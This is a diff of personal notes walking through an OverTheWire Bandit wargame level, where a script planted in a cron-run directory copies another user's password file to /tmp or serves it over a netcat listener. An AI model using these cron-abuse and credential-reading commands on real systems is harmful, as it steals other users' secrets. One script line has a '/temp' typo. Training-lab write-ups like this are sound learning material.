kolkhis/tech-notes/linux/bandit-labs/notes.md

     target_dest="/tmp/b24pass.txt"
     touch "$target_dest"
     chmod 777 "$target_dest"
-    printf "Attempting to output contents of password file...\n" > "$target_dest" cat /etc/bandit_pass/bandit24 > "$target_dest"
+    cat /etc/bandit_pass/bandit24 > "$target_dest"
     ```

     This script should be run as the user bandit24 every minute then deleted, and
     should have access to the password file.

+    We can then tail the file that we're outputting to.
     ```bash
     tail -F /tmp/b24pass.txt
     ```

-    This seems to not be working for whatever reason.
+    This seems to not be working.
-    It turns out it was the `/tmp` directory permissions (see the "Alternate
-    Solution" section, we used that before we figured this out).

     The script file is deleted, however it does not create the /tmp/b24pass.txt file for us to read.

-    `printf '#!/bin/bash\ncat /etc/bandit_pass/bandit24 > /tmp/b24/pass.txt\n' > foo/kol.sh; chmod 755 foo/kol.sh`
+    It turns out it was the `/tmp` directory permissions that were the problem
+    with that script (see the "Alternate Solution" section, we used that before we
+    figured this out).

+    Since it's being deleted, we can use this oneliner to quickly generate a
+    new script.

     ```bash
+    printf '#!/bin/bash\ncat /etc/bandit_pass/bandit24 > /tmp/b24/pass.txt\n' > foo/kol.sh; chmod 755 foo/kol.sh
+    ```

+    We need to set up a **subdirectory** within `/tmp` to write to, **then**
+    generate the script.
+    ```bash
     mkdir /tmp/b24
     chmod 777 /tmp/b24
     printf '#!/bin/bash\ncat /etc/bandit_pass/bandit24 > /tmp/b24/pass.txt\n' > foo/kol.sh; chmod 755 foo/kol.sh
     tail -F /tmp/b24/pass.txt
     ```
+    This should give us the password to bandit24.

+    Alternatively, the `/tmp/b24` directory creation could be part of the
+    script itself:
+    ```bash
+    #!/bin/bash
+    mkdir /tmp/b24
+    chmod 777 /tmp/b24
+    cat /etc/bandit_pass/bandit24 > /temp/b24/pass.txt
+    ```

 ??? warning "Alternate Solution"

+    This was the solution we used before we figured out the permissions issue on the
+    `/tmp` directory.
     Serve using netcat.
     ```bash
     #!/bin/bash
     trap : SIGKILL # Trap signal 9 because the cron script is using `timeout -s 9` nc -lp 1234 < /etc/bandit_pass/bandit24 &
     ```
+    The `trap` is to prevent the `timeout -s 9` from killing our listener
+    before we have a chance to connect.

+    Since we have a small window of time to connect after the script is run, we
+    can use a `printf` oneliner to generate the script.
     ```bash
     printf '#!/bin/bash\ntrap : 9\nnc -lp 1234 < /etc/bandit_pass/bandit24 &\n' > ./foo/kol.sh && chmod 755 ./foo/kol.sh
     ```